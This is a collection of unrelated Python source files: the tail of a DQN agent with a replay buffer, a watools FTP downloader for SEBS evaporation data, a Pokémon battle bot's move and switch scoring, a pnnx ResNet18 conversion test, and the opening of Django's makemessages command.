state (array_like): current state
eps (float): epsilon, for epsilon-greedy action selection
"""
state = torch.from_numpy(state).float().unsqueeze(0).to(self.device)
self.qnetwork_local.eval()
with torch.no_grad():
action_values = self.qnetwork_local(state)
self.qnetwork_local.train()
# Epsilon-greedy action selection
if random.random() > eps:
return np.argmax(action_values.cpu().data.numpy())
else:
return random.choice(np.arange(self.action_size))
def dqn_qtargets_next(self, next_states):
return self.qnetwork_target(next_states).detach().max(1)[0].unsqueeze(1)
def double_dqn_qtargets_next(self, next_states):
next_actions = self.qnetwork_local(next_states).detach().argmax(1)
q_targets = self.qnetwork_target(next_states).detach()
return torch.gather(q_targets, 1, next_actions.unsqueeze(-1))
def learn(self, experiences, gamma):
"""Update value parameters using given batch of experience tuples.
Params
======
experiences (Tuple[torch.Tensor]): tuple of (s, a, r, s', done) tuples
gamma (float): discount factor
"""
states, actions, rewards, next_states, dones = experiences
# Get max predicted Q values (for next states) from target model
Q_targets_next = self.qtargets_next(next_states)
# Compute Q targets for current states
Q_targets = rewards + (gamma * Q_targets_next * (1 - dones))
# Get expected Q values from local model
Q_expected = self.qnetwork_local(states).gather(1, actions)
# Compute loss
loss = F.mse_loss(Q_expected, Q_targets)
# Minimize the loss
self.optimizer.zero_grad()
loss.backward()
self.optimizer.step()
# ------------------- update target network ------------------- #
self.soft_update(self.qnetwork_local, self.qnetwork_target, TAU)
def soft_update(self, local_model, target_model, tau):
"""Soft update model parameters.
θ_target = τ*θ_local + (1 - τ)*θ_target
Fixed Q-Targets: Breaks the correlation of learning target with
parameters we are changing (moving target)
Params
======
local_model (PyTorch model): weights will be copied from
target_model (PyTorch model): weights will be copied to
tau (float): interpolation parameter
"""
for target_param, local_param in zip(target_model.parameters(), local_model.parameters()):
target_param.data.copy_(tau*local_param.data + (1.0-tau)*target_param.data)
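    # Worked example (illustrative): with tau = 1e-3, a target weight of 0.0 and
    # a local weight of 1.0 update to 0.001*1.0 + 0.999*0.0 = 0.001, i.e. the
    # target network drifts slowly toward the local network on each learning step.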
class ReplayBuffer:
"""Fixed-size buffer to store experience tuples."""
def __init__(self, action_size, buffer_size, batch_size, seed, device):
"""Initialize a ReplayBuffer object.
Params
======
action_size (int): dimension of each action
buffer_size (int): maximum size of buffer
batch_size (int): size of each training batch
seed (int): random seed
"""
self.action_size = action_size
self.memory = deque(maxlen=buffer_size)
self.batch_size = batch_size
self.experience = namedtuple("Experience", field_names=["state", "action", "reward", "next_state", "done"])
self.seed = random.seed(seed)
self.device = device
def add(self, state, action, reward, next_state, done):
"""Add a new experience to memory."""
e = self.experience(state, action, reward, next_state, done)
self.memory.append(e)
def sample(self):
"""Randomly sample a batch of experiences from memory."""
experiences = random.sample(self.memory, k=self.batch_size)
states = torch.from_numpy(np.vstack([e.state for e in experiences if e is not None])).float().to(self.device)
actions = torch.from_numpy(np.vstack([e.action for e in experiences if e is not None])).long().to(self.device)
rewards = torch.from_numpy(np.vstack([e.reward for e in experiences if e is not None])).float().to(self.device)
next_states = torch.from_numpy(np.vstack([e.next_state for e in experiences if e is not None])).float().to(self.device)
dones = torch.from_numpy(np.vstack([e.done for e in experiences if e is not None]).astype(np.uint8)).float().to(self.device)
return (states, actions, rewards, next_states, dones)
def __len__(self):
"""Return the current size of internal memory."""
return len(self.memory)
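# Minimal usage sketch (my addition, not part of the original project); the
# environment interaction below is a random stand-in, since the real project
# supplies its own environment:
# agent = Agent(state_size=8, action_size=4, seed=0, device="cpu")
# state = np.zeros(8, dtype=np.float32)
# for t in range(10):
#     action = agent.act(state, eps=0.1)
#     next_state = np.random.rand(8).astype(np.float32)
#     reward, done = 0.0, False
#     agent.step(state, action, reward, next_state, done)
#     state = next_state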
|
the-stack_106_13005
|
# -*- coding: utf-8 -*-
"""
Authors: Tim Hessels and Gonzalo Espinoza
UNESCO-IHE 2016
Contact: [email protected]
[email protected]
Repository: https://github.com/wateraccounting/watools
Module: Collect/SEBS
Restrictions:
The data and this python file may not be distributed to others without
permission of the WA+ team due to data restrictions of the SEBS developers.
Description:
This script collects SEBS data from the UNESCO-IHE FTP server. The data has a
monthly temporal resolution and a spatial resolution of 0.01 degree. The
resulting tiff files are in the WGS84 projection.
The data is available between 2000-03-01 till 2015-12-31.
Example:
from watools.Collect import SEBS
SEBS.monthly(Dir='C:/Temp/', Startdate='2003-02-24', Enddate='2003-03-09',
latlim=[50,54], lonlim=[3,7])
"""
from __future__ import print_function
# General modules
import numpy as np
import os
import pandas as pd
from ftplib import FTP
import scipy.io as spio
# Water Accounting Modules
import watools.WebAccounts as WebAccounts
import watools.General.data_conversions as DC
def DownloadData(Dir, Startdate, Enddate, latlim, lonlim, Waitbar):
"""
This scripts downloads SEBS ET data from the UNESCO-IHE ftp server.
The output files display the total ET in mm for a period of one month.
The name of the file corresponds to the first day of the month.
Keyword arguments:
Dir -- 'C:/file/to/path/'
Startdate -- 'yyyy-mm-dd'
Enddate -- 'yyyy-mm-dd'
    lonlim -- [xmin, xmax] (values must be between -180 and 180)
    latlim -- [ymin, ymax] (values must be between -90 and 90)
"""
    # Check the latitude and longitude and otherwise clamp them to the greatest extent
    if latlim[0] < -90 or latlim[1] > 90:
        print('Latitude above 90N or below 90S is not possible. Value set to maximum')
        latlim[0] = max(latlim[0], -90)   # builtin max/min: np.max(x, -90) would treat -90 as an axis
        latlim[1] = min(latlim[1], 90)
    if lonlim[0] < -180 or lonlim[1] > 180:
        print('Longitude must be between 180E and 180W. Value set to maximum')
        lonlim[0] = max(lonlim[0], -180)
        lonlim[1] = min(lonlim[1], 180)
# Check Startdate and Enddate
if not Startdate:
Startdate = pd.Timestamp('2000-01-01')
if not Enddate:
Enddate = pd.Timestamp('2017-06-30')
# Creates dates library
Dates = pd.date_range(Startdate, Enddate, freq = "MS")
# Create Waitbar
if Waitbar == 1:
import watools.Functions.Start.WaitbarConsole as WaitbarConsole
total_amount = len(Dates)
amount = 0
WaitbarConsole.printWaitBar(amount, total_amount, prefix = 'Progress:', suffix = 'Complete', length = 50)
# Define directory and create it if not exists
output_folder = os.path.join(Dir, 'Evaporation', 'SEBS', 'Monthly')
if not os.path.exists(output_folder):
os.makedirs(output_folder)
for Date in Dates:
# Define year and month
year = Date.year
month = Date.month
# Date as printed in filename
Filename_out= os.path.join(output_folder,'ETa_SEBS_mm-month-1_monthly_%s.%02s.%02s.tif' %(Date.strftime('%Y'), Date.strftime('%m'), Date.strftime('%d')))
# Define end filename
Filename_in = os.path.join("ETm%d%02d.mat" %(year, month))
# Temporary filename for the downloaded global file
local_filename = os.path.join(output_folder, Filename_in)
# Download the data from FTP server if the file not exists
if not os.path.exists(Filename_out):
try:
Download_SEBS_from_WA_FTP(local_filename, Filename_in)
# Clip dataset
Clip_Dataset(local_filename, Filename_out, latlim, lonlim)
os.remove(local_filename)
except:
print("Was not able to download file with date %s" %Date)
# Adjust waitbar
if Waitbar == 1:
amount += 1
WaitbarConsole.printWaitBar(amount, total_amount, prefix = 'Progress:', suffix = 'Complete', length = 50)
return
def Download_SEBS_from_WA_FTP(local_filename, Filename_in):
"""
This function retrieves SEBS data for a given date from the
ftp.wateraccounting.unesco-ihe.org server.
Restrictions:
The data and this python file may not be distributed to others without
    permission of the WA+ team due to data restrictions of the SEBS developers.
Keyword arguments:
local_filename -- name of the temporary file which contains global SEBS data
Filename_in -- name of the end file with the monthly SEBS data
"""
# Collect account and FTP information
username, password = WebAccounts.Accounts(Type = 'FTP_WA')
ftpserver = "ftp.wateraccounting.unesco-ihe.org"
# Download data from FTP
ftp=FTP(ftpserver)
ftp.login(username,password)
directory="/WaterAccounting_Guest/SEBS/Global_land_ET_V1/"
ftp.cwd(directory)
lf = open(local_filename, "wb")
ftp.retrbinary("RETR " + Filename_in, lf.write)
lf.close()
return
def Clip_Dataset(local_filename, Filename_out, latlim, lonlim):
# Open Dataset
SEBS_Array = spio.loadmat(local_filename)['ETm']
# Define area
XID = [int(np.floor((180 + lonlim[0])/0.05)), int(np.ceil((180 + lonlim[1])/0.05))]
YID = [int(np.ceil((90 - latlim[1])/0.05)), int(np.floor((90 - latlim[0])/0.05))]
# Define Georeference
geo = tuple([-180 + 0.05*XID[0],0.05,0,90 - 0.05*YID[0],0,-0.05])
# Clip Array
SEBS_Array_clipped = SEBS_Array[YID[0]:YID[1], XID[0]:XID[1]] * 0.1
# Save tiff file
DC.Save_as_tiff(Filename_out, SEBS_Array_clipped, geo, "WGS84")
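# Worked example (illustrative): for lonlim = [3, 7] and latlim = [50, 54] on the
# 0.05-degree grid, XID = [3660, 3740] and YID = [720, 800], so the geotransform
# places the upper-left corner of the clipped raster at approximately 3.0 E, 54.0 N.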
|
the-stack_106_13006
|
from random import randint, choice
from copy import deepcopy
from data.moves import Moves
from data.pokedex import Pokedex
from data.types import Types
blacklist = {'focuspunch','fakeout','snore','dreameater','lastresort','explosion','selfdestruct','synchronoise','belch','trumpcard','wringout'}
zmoves = {'fairiumz':'twinkletackle',
'groundiumz':'tectonicrage',
'flyiniumz':'supersonicskystrike',
'iciumz':'subzeroslammer',
'psychiumz':'shatteredpsyche',
'ghostiumz':'neverendingnightmare',
'firiumz':'infernooverdrive',
'wateriumz':'hydrovortex',
'buginiumz':'savagespinout',
'electriumz':'gigavolthavoc',
'dragoniumz':'devastatingdrake',
'steeliumz':'corkscrewcrash',
'rockiumz':'continentalcrush',
'normaliumz':'breakneckblitz',
'grassiumz':'bloomdoom',
'darkiniumz':'blackholeeclipse',
'fightiniumz':'alloutpummeling',
'poisoniumz':'aciddownpour',
'aloraichiumz':'stokedsparksurfer',
'marshadiumz':'soulstealing7starstrike',
'decidiumz':'sinisterarrowraid',
'snorliumz':'pulverizingpancake',
'primariumz':'oceanicoperetta',
'inciniumz':'maliciousmoonsault',
'tapuniumz':'guardianofalola',
'mewniumz':'genesissupernova',
'eeviumz':'extremeevoboost',
'pikaniumz':'catastropika',
'pikashuniumz':'10000000voltthunderbolt',
'kommoniumz':'clangoroussoulblaze',
'lunaliumz':'menacingmoonrazemaelstrom',
'lycaniumz':'splinteredstormshards',
'mimikiumz':'letssnuggleforever',
'solganiumz':'searingsunrazesmash',
'ultranecroziumz':'lightthatburnsthesky'
}
dynamaxmoves = {
"Flying": 'maxairstream',
"Dark": 'maxdarkness',
"Fire": 'maxflare',
"Bug": 'maxflutterby',
"Water": 'maxgeyser',
"Status": 'maxguard',
"Ice": 'maxhailstorm',
"Fighting": 'maxknuckle',
"Electric": 'maxlightning',
"Psychic": 'maxmindstorm',
"Poison": 'maxooze',
"Grass": 'maxovergrowth',
"Ghost": 'maxphantasm',
"Ground": 'maxquake',
"Rock": 'maxrockfall',
"Fairy": 'maxstarfall',
"Steel": 'maxsteelspike',
"Normal": 'maxstrike',
"Dragon": 'maxwyrmwind',
}
waterImmune = ['Dry Skin','Water Absorb','Storm Drain']
grassImmune = ['Sap Sipper']
fireImmune = ['Flash Fire']
groundImmune = ['Levitate']
def getUsableZmove(pokemon):
zcrystals = zmoves.keys()
if not pokemon.item in zcrystals: return None
zmovedata = deepcopy(Moves[zmoves[pokemon.item]])
if zmovedata['basePower'] == 1:
for move in pokemon.moves:
if 'hiddenpower' in move:
move = move[:-2] if not move == 'hiddenpower' else move
for var in ('return', 'frustration'):
if move.startswith(var):
move = var
if Moves[move]['type'] == zmovedata['type']:
zmovedata['baseMove'] = move
if Moves[move]['category'] == 'Status':
zmovedata['basePower'] = 0
zmovedata['category'] = 'Status'
if 'zMoveBoost' in Moves[move]:
zmovedata['boosts'] = Moves[move]['zMoveBoost']
else:
zmovedata['basePower'] = Moves[move]['zMovePower']
# If no move matches this isn't a Z-Crystal we can use
if zmovedata['basePower'] == 1: return None
# Status Z-Moves are technically fine to use
return zmovedata
else:
# Only need this right here
def addBase(zmove, base):
zmove['baseMove'] = base
return zmove
        # Only signature Z-Moves like Sinister Arrow Raid have a base power here, so check whether they're usable
if zmovedata['id'] == 'catastropika' and pokemon.species == 'Pikachu' and 'thunderbolt' in pokemon.moves: return addBase(zmovedata, 'thunderbolt')
if zmovedata['id'] == 'extremeevoboost' and pokemon.species == 'Eevee' and 'lastresort' in pokemon.moves: return addBase(zmovedata, 'lastresort')
if zmovedata['id'] == 'genesissupernova' and pokemon.species == 'Mew' and 'psychic' in pokemon.moves: return addBase(zmovedata, 'psychic')
        if zmovedata['id'] == 'sinisterarrowraid' and pokemon.species == 'Decidueye' and 'spiritshackle' in pokemon.moves: return addBase(zmovedata, 'spiritshackle')
if zmovedata['id'] == 'stokedsparksurfer' and pokemon.species == 'Raichu-Alola' and 'thunderbolt' in pokemon.moves: return addBase(zmovedata, 'thunderbolt')
        if zmovedata['id'] == 'pulverizingpancake' and pokemon.species == 'Snorlax' and 'gigaimpact' in pokemon.moves: return addBase(zmovedata, 'gigaimpact')
        if zmovedata['id'] == 'maliciousmoonsault' and pokemon.species == 'Incineroar' and 'darkestlariat' in pokemon.moves: return addBase(zmovedata, 'darkestlariat')
if zmovedata['id'] == 'oceanicoperetta' and pokemon.species == 'Primarina' and 'sparklingaria' in pokemon.moves: return addBase(zmovedata, 'sparklingaria')
if zmovedata['id'] == 'soulstealing7starstrike' and pokemon.species == 'Marshadow' and 'spectralthief' in pokemon.moves: return addBase(zmovedata, 'spectralthief')
if zmovedata['id'] == 'clangoroussoulblaze' and pokemon.species == 'Kommo-o' and 'clangingscales' in pokemon.moves: return addBase(zmovedata, 'clangingscales')
if zmovedata['id'] == 'lightthatburnsthesky' and pokemon.species == 'Necrozma-Ultra' and 'photongeyser' in pokemon.moves: return addBase(zmovedata, 'photongeyser')
if zmovedata['id'] == 'letssnuggleforever' and pokemon.species in ('Mimikyu', 'Mimikyu-Busted') and 'playrough' in pokemon.moves: return addBase(zmovedata, 'playrough')
if zmovedata['id'] == 'menacingmoonrazemaelstrom' and pokemon.species in ('Lunala', 'Necrozma-Dawn-Wings') and 'moongeistbeam' in pokemon.moves: return addBase(zmovedata, 'moongeistbeam')
        if zmovedata['id'] == 'searingsunrazesmash' and pokemon.species in ('Solgaleo', 'Necrozma-Dusk-Mane') and 'sunsteelstrike' in pokemon.moves: return addBase(zmovedata, 'sunsteelstrike')
if zmovedata['id'] == 'splinteredstormshards' and pokemon.species in ('Lycanroc', 'Lycanroc-Midnight', 'Lycanroc-Dusk') and 'stoneedge' in pokemon.moves: return addBase(zmovedata, 'stoneedge')
if zmovedata['id'] == 'guardianofalola' and pokemon.species in ('Tapu Koko', 'Tapu Bulu', 'Tapu Fini', 'Tapu Lele') and 'naturesmadness' in pokemon.moves: return addBase(zmovedata, 'naturesmadness')
# Shouldn't ever get here, but just in case do an explicit return with a specific falsy value
return False
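# Rough example of getUsableZmove (illustrative; exact numbers come from the
# Moves data): a holder of 'firiumz' that knows a 90-BP Fire move such as
# flamethrower gets an 'infernooverdrive' entry whose basePower is that move's
# zMovePower (175 under the usual Z-power table), with baseMove set to the move.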
def getDynamaxMoves(pokemon, canDynamax=False):
if not pokemon.dynamaxed and not canDynamax:
return []
maxmoves = []
for move in pokemon.moves:
if 'hiddenpower' in move:
move = move[:-2] if not move == 'hiddenpower' else move
for var in ('return', 'frustration'):
if move.startswith(var):
move = var
baseMoveData = Moves[move]
maxmove = dynamaxmoves[baseMoveData['type']]
if baseMoveData['category'] == 'Status':
maxmove = dynamaxmoves['Status']
if pokemon.dynamaxed == 'gmax':
try:
gmaxmove = Pokedex[pokemon.species + '-Gmax']['gmaxMove']
if Moves[gmaxmove]['type'] == baseMoveData['type']:
maxmove = gmaxmove
except KeyError:
# If a Gmax doesn't have their Gmax move yet
pass
# Copy to not affect the data
maxmoveCopy = deepcopy(Moves[maxmove])
maxmoveCopy['baseMove'] = move
maxmoveCopy['category'] = baseMoveData['category']
if baseMoveData['category'] != 'Status':
try:
gmaxPower = baseMoveData['gmaxPower']
except KeyError:
# No gmax power set, calculate it
basePower = baseMoveData['basePower']
moveType = maxmoveCopy['type']
if not basePower:
gmaxPower = 100
if moveType in ('Fighting', 'Poison'):
if basePower >= 150:
gmaxPower = 100
elif basePower >= 110:
gmaxPower = 95
elif basePower >= 75:
gmaxPower = 90
elif basePower >= 65:
gmaxPower = 85
elif basePower >= 45:
gmaxPower = 75
else:
gmaxPower = 70
else:
if basePower >= 150:
gmaxPower = 150
elif basePower >= 110:
gmaxPower = 140
elif basePower >= 75:
gmaxPower = 130
elif basePower >= 65:
gmaxPower = 120
elif basePower >= 55:
gmaxPower = 110
elif basePower >= 45:
gmaxPower = 100
else:
gmaxPower = 90
maxmoveCopy['basePower'] = gmaxPower
maxmoves.append(maxmoveCopy)
return maxmoves
def getBaseSpecies(species):
if species in Pokedex: return species
species = species.split('-')[0]
return species
def getAction(battle, playing):
active = battle.me.active
moves = battle.myActiveData[0]['moves']
if playing.endswith('challengecup1v1'):
return getMove(moves, active, battle.other.active, battle), 'move'
else:
act = pickAction(battle, battle.me, battle.other.active)
if act == 'switch':
return getSwitch(battle.me, active.species, battle.other.active), 'switch'
else:
return getMove(moves, active, battle.other.active, battle), 'move'
def calcMatchup(me, other):
score = 0
if me.item.startswith('choice') and me.lastMoveUsed:
score = calcScore(me.lastMoveUsed, me, other.species)
else:
for m in me.moves:
score += calcScore(m, me, other.species)
zmove = getUsableZmove(me)
if zmove:
score += calcScore(zmove, me, other.species)
for m in getDynamaxMoves(me, canDynamax=me.side.canDynamax):
score += calcScore(m, me, other.species)
return score
def pickAction(battle, me, other):
matchups = {}
for mon in me.team:
if not me.team[mon].status == 'fnt':
matchups[mon] = calcMatchup(me.team[mon], other)
if matchups[me.active.species] > 140:
return 'move'
best = [poke for poke,res in matchups.items() if res == max(matchups.values())]
if best[0] == me.active.species:
return 'move'
fainted = 0
for mon in me.team:
if me.team[mon].status == 'fnt':
fainted += 1
if fainted == 5:
return 'move'
if not randint(0,5):
return 'move'
if 'trapped' in battle.myActiveData[0] or me.active.trapped:
return 'move'
return 'switch'
def getMove(moves, active, opponent, battle):
action = ''
move = getCC1v1Move(moves, active, opponent)
if 'isZ' in move and active.side.canZmove:
if battle.hackmons:
# Call this move by its 1-indexed index not name
for i, val in enumerate(moves):
if val['id'] == move['id']:
action += '{}'.format(i + 1)
break
else:
action += '{} zmove'.format(move['baseMove'])
elif 'isMax' in move:
try:
action += move['baseMove']
except KeyError as e:
print(moves)
print(move)
print(e)
if not active.dynamaxed:
action += ' dynamax'
else:
action += move['id']
if active.canMega:
action += ' mega'
if active.canUltraBurst:
action += ' ultra'
return action
def getSwitch(mySide, myActiveSpecies, opponent):
scores = {}
myTeam = mySide.team
for poke in myTeam:
scores[poke] = 0
if myTeam[poke].status == 'fnt':
scores[poke] = -1000
continue
moves = myTeam[poke].moves
for move in moves:
scores[poke] += calcScore(move, myTeam[poke], opponent.species)
zmove = getUsableZmove(myTeam[poke])
if zmove:
scores[poke] += calcScore(zmove, myTeam[poke], opponent.species)
for move in getDynamaxMoves(myTeam[poke], canDynamax=mySide.canDynamax):
scores[poke] += calcScore(move, myTeam[poke], opponent.species)
m = max(scores.values())
picks = [poke for poke,score in scores.items() if score == m]
pick = 0
if len(picks) == 1:
if myActiveSpecies not in picks:
pick = myTeam[picks[0]].teamSlot
else:
if myActiveSpecies in picks:
picks.remove(myActiveSpecies)
pick = myTeam[choice(picks)].teamSlot
if pick <= 1:
notFaintedMons = []
for mon in myTeam:
if not myTeam[mon].status == 'fnt' and not myTeam[mon].teamSlot == 1:
notFaintedMons.append(myTeam[mon].teamSlot)
pick = choice(notFaintedMons)
return pick
def getCC1v1Move(moves, pokemon, opponent):
# Moves is a list of 4 moves, possibly good or bad moves...
# Copy this list so we don't ruin the original one when we append the Z-Move
movescopy = []
if not pokemon.dynamaxed:
for move in moves:
if 'pp' in move and move['pp'] <= 0: continue # Skip 0 pp moves
if 'disabled' in move and move['disabled']: continue
m = move['move'].replace(' ','').lower()
for fault in ['-', "'"]:
m = m.replace(fault,'')
if m == 'recharge': return {'id': m}
for var in ['return', 'frustration']:
if m.startswith(var):
m = var
movescopy.append(Moves[m])
zmove = getUsableZmove(pokemon)
if zmove:
movescopy.append(zmove)
# Dynamaxed Pokemon have different moves they use
# This is also going to decide if we should dynamax
movescopy += getDynamaxMoves(pokemon, pokemon.side.canDynamax)
if pokemon.isChoiceLocked() and not movescopy[0]['id'] == 'struggle':
movescopy = [Moves[pokemon.lastMoveUsed]]
# Early return if there's only one possible option to use
if len(movescopy) == 1:
return movescopy[0]
values = {}
for move in movescopy:
moveid = move['id']
mySpecies = getBaseSpecies(pokemon.species)
oppSpecies = getBaseSpecies(opponent.species)
if 'isZ' in move and not pokemon.side.canZmove:
values[moveid] = 0
continue
# This begins a score system for the moves, naively trying to pick the best moves without calculating damage
# Based on the move's base power
values[moveid] = move['basePower'] if not 'calculateBasePower' in move else move['calculateBasePower'](Pokedex[mySpecies], Pokedex[oppSpecies])
try:
values[moveid] = move['modifyBasePower'](values[moveid], pokemon, opponent)
except KeyError:
pass # expected
chargeMove = 'recharge' in Moves[moveid]['flags'] or 'charge' in Moves[moveid]['flags']
if moveid in blacklist or chargeMove or 'mindBlownRecoil' in Moves[moveid]:
values[moveid] = 0
continue
# STAB-bonus
if move['type'] in Pokedex[mySpecies]['types']:
values[moveid] *= 1.5
# Stat drops and raises
boostTable = [1, 1.5, 2, 2.5, 3, 3.5, 4]
category = 'atk' if move['category'] == 'Physical' else 'spa'
if 'useAlternativeOffensiveStat' in move:
category = move['useAlternativeOffensiveStat']
if pokemon.boosts[category] > 0 or opponent.boosts[category] < 0:
values[moveid] *= boostTable[pokemon.boosts[category]]
if pokemon.boosts[category] < 0 or opponent.boosts[category] > 0:
values[moveid] /= boostTable[-pokemon.boosts[category]]
# Multiply with the effectiveness of the move
eff = 1
if len(Pokedex[oppSpecies]['types']) > 1:
types = Pokedex[oppSpecies]['types']
eff = Types[types[0]][move['type']] * Types[types[1]][move['type']]
else:
eff = Types[ Pokedex[oppSpecies]['types'][0] ][move['type']]
values[moveid] *= eff
# Abilities that give immunities
if move['type'] == 'Water' and Pokedex[oppSpecies]['abilities']['0'] in waterImmune:
values[moveid] = 0
if move['type'] == 'Fire' and Pokedex[oppSpecies]['abilities']['0'] in fireImmune:
values[moveid] = 0
if move['type'] == 'Grass' and Pokedex[oppSpecies]['abilities']['0'] in grassImmune:
values[moveid] = 0
        if move['type'] == 'Ground' and (Pokedex[oppSpecies]['abilities']['0'] in groundImmune or opponent.item == 'airballoon'):
values[moveid] = 0
# Ignore most items for now
if pokemon.item == 'choiceband' and move['category'] == 'Physical': values[moveid] *= 1.5
if pokemon.item == 'choicespecs' and move['category'] == 'Special': values[moveid] *= 1.5
if pokemon.item == 'lifeorb': values[moveid] *= 1.3
# Status
if pokemon.status == 'brn' and move['category'] == 'Physical':
if pokemon.ability == 'guts':
values[moveid] *= 1.5
else:
values[moveid] /= 2
options = [m for m,v in values.items() if v == max(values.values())]
picked = choice(options)
return [m for m in movescopy if m['id'] == picked][0]
def getLead(team, opposing):
scores = {}
for mon in team:
scores[mon] = 0
moves = team[mon].moves
for opp in opposing:
for move in moves:
scores[mon] += calcScore(move, team[mon], opp)
zmove = getUsableZmove(team[mon])
if zmove:
scores[mon] += calcScore(zmove, team[mon], opp)
for move in getDynamaxMoves(team[mon], canDynamax=team[mon].side.canDynamax):
scores[mon] += calcScore(move, team[mon], opp)
m = max(scores.values())
options = [poke for poke,score in scores.items() if score == m]
if len(options) > 0:
return team[choice(options)].teamSlot
else:
print('WARNING: Failed to pick proper lead, using random.')
return randint(1, 6)
def calcScore(move, mon, opponents):
''' Calculates an arbitrary score for a move against an opponent to decide how good it is '''
if type(move) is str:
if 'hiddenpower' in move:
move = move[:-2] if not move == 'hiddenpower' else move
for var in ['return', 'frustration']:
if move.startswith(var):
move = var
move = move.replace("'",'')
move = Moves[move]
opp = Pokedex[getBaseSpecies(opponents)]
score = move['basePower'] - (100 - move['accuracy'])
oBias = 'Physical' if mon.stats['atk'] > mon.stats['spa'] else 'Special'
if mon.stats['atk'] == mon.stats['spa']:
oBias = 'No bias'
dBias = 'Physical' if opp['baseStats']['def'] > opp['baseStats']['spd'] else 'Special'
if opp['baseStats']['def'] == opp['baseStats']['spd']:
dBias = 'No bias'
if move['category'] == oBias:
score += 10
if move['category'] == dBias:
score -= 10
# Typing
eff = Types[opp['types'][0]][move['type']]
if len(opp['types']) > 1:
eff *= Types[opp['types'][1]][move['type']]
score *= eff
# Ability
if mon.ability == 'sheerforce' and move['secondary']:
score *= 1.2
if mon.ability == 'strongjaw' and 'bite' in move['flags']:
score *= 1.5
if mon.ability in ['hugepower','purepower', 'adaptability']:
score *= 2
# Ignore most items for now
if mon.item == 'choiceband' and move['category'] == 'Physical': score *= 1.5
if mon.item == 'choicespecs' and move['category'] == 'Special': score *= 1.5
if mon.item == 'lifeorb': score *= 1.3
# Status
if mon.status == 'brn' and move['category'] == 'Physical': score /= 2
return score
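# Rough worked example for calcScore (illustrative; exact values depend on the
# data tables): a 90-BP, 100-accuracy move against a 2x-weak target, with no
# category bias on either side, scores roughly (90 - 0) * 2 = 180 before the
# ability, item, and status modifiers are applied.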
|
the-stack_106_13008
|
# Tencent is pleased to support the open source community by making ncnn available.
#
# Copyright (C) 2021 THL A29 Limited, a Tencent company. All rights reserved.
#
# Licensed under the BSD 3-Clause License (the "License"); you may not use this file except
# in compliance with the License. You may obtain a copy of the License at
#
# https://opensource.org/licenses/BSD-3-Clause
#
# Unless required by applicable law or agreed to in writing, software distributed
# under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR
# CONDITIONS OF ANY KIND, either express or implied. See the License for the
# specific language governing permissions and limitations under the License.
import torch
import torchvision.models as models
def test():
net = models.resnet18()
net.eval()
torch.manual_seed(0)
x = torch.rand(1, 3, 224, 224)
a = net(x)
# export torchscript
mod = torch.jit.trace(net, x)
mod.save("test_resnet18.pt")
# torchscript to pnnx
import os
os.system("../../src/pnnx test_resnet18.pt inputshape=[1,3,224,224]")
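    # Assumption for context: pnnx is expected to generate, among other outputs,
    # the test_resnet18_ncnn.py helper imported below together with ncnn
    # .param/.bin files; the exact artifacts depend on the pnnx version.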
# ncnn inference
import test_resnet18_ncnn
b = test_resnet18_ncnn.test_inference()
return torch.allclose(a, b, 1e-4, 1e-4)
if __name__ == "__main__":
if test():
exit(0)
else:
exit(1)
|
the-stack_106_13011
|
import glob
import os
import re
import sys
from functools import total_ordering
from itertools import dropwhile
import django
from django.conf import settings
from django.core.exceptions import ImproperlyConfigured
from django.core.files.temp import NamedTemporaryFile
from django.core.management.base import BaseCommand, CommandError
from django.core.management.utils import (
find_command, handle_extensions, is_ignored_path, popen_wrapper,
)
from django.utils.encoding import DEFAULT_LOCALE_ENCODING
from django.utils.functional import cached_property
from django.utils.jslex import prepare_js_for_gettext
from django.utils.regex_helper import _lazy_re_compile
from django.utils.text import get_text_list
from django.utils.translation import templatize
plural_forms_re = _lazy_re_compile(r'^(?P<value>"Plural-Forms.+?\\n")\s*$', re.MULTILINE | re.DOTALL)
STATUS_OK = 0
NO_LOCALE_DIR = object()
def check_programs(*programs):
for program in programs:
if find_command(program) is None:
raise CommandError(
"Can't find %s. Make sure you have GNU gettext tools 0.15 or "
"newer installed." % program
)
@total_ordering
class TranslatableFile:
def __init__(self, dirpath, file_name, locale_dir):
self.file = file_name
self.dirpath = dirpath
self.locale_dir = locale_dir
def __repr__(self):
return "<%s: %s>" % (
self.__class__.__name__,
os.sep.join([self.dirpath, self.file]),
)
def __eq__(self, other):
return self.path == other.path
def __lt__(self, other):
return self.path < other.path
@property
def path(self):
return os.path.join(self.dirpath, self.file)
class BuildFile:
"""
Represent the state of a translatable file during the build process.
"""
def __init__(self, command, domain, translatable):
self.command = command
self.domain = domain
self.translatable = translatable
@cached_property
def is_templatized(self):
if self.domain == 'djangojs':
return self.command.gettext_version < (0, 18, 3)
elif self.domain == 'django':
file_ext = os.path.splitext(self.translatable.file)[1]
return file_ext != '.py'
return False
@cached_property
def path(self):
return self.translatable.path
@cached_property
def work_path(self):
"""
Path to a file which is being fed into GNU gettext pipeline. This may
be either a translatable or its preprocessed version.
"""
if not self.is_templatized:
return self.path
extension = {
'djangojs': 'c',
'django': 'py',
}.get(self.domain)
filename = '%s.%s' % (self.translatable.file, extension)
return os.path.join(self.translatable.dirpath, filename)
def preprocess(self):
"""
Preprocess (if necessary) a translatable file before passing it to
xgettext GNU gettext utility.
"""
if not self.is_templatized:
return
with open(self.path, encoding='utf-8') as fp:
src_data = fp.read()
if self.domain == 'djangojs':
content = prepare_js_for_gettext(src_data)
elif self.domain == 'django':
content = templatize(src_data, origin=self.path[2:])
with open(self.work_path, 'w', encoding='utf-8') as fp:
fp.write(content)
def postprocess_messages(self, msgs):
"""
Postprocess messages generated by xgettext GNU gettext utility.
Transform paths as if these messages were generated from original
translatable files rather than from preprocessed versions.
"""
if not self.is_templatized:
return msgs
# Remove '.py' suffix
if os.name == 'nt':
# Preserve '.\' prefix on Windows to respect gettext behavior
old_path = self.work_path
new_path = self.path
else:
old_path = self.work_path[2:]
new_path = self.path[2:]
return re.sub(
r'^(#: .*)(' + re.escape(old_path) + r')',
lambda match: match[0].replace(old_path, new_path),
msgs,
flags=re.MULTILINE
)
def cleanup(self):
"""
Remove a preprocessed copy of a translatable file (if any).
"""
if self.is_templatized:
# This check is needed for the case of a symlinked file and its
# source being processed inside a single group (locale dir);
# removing either of those two removes both.
if os.path.exists(self.work_path):
os.unlink(self.work_path)
def normalize_eols(raw_contents):
"""
Take a block of raw text that will be passed through str.splitlines() to
get universal newlines treatment.
Return the resulting block of text with normalized `\n` EOL sequences ready
to be written to disk using current platform's native EOLs.
"""
lines_list = raw_contents.splitlines()
# Ensure last line has its EOL
if lines_list and lines_list[-1]:
lines_list.append('')
return '\n'.join(lines_list)
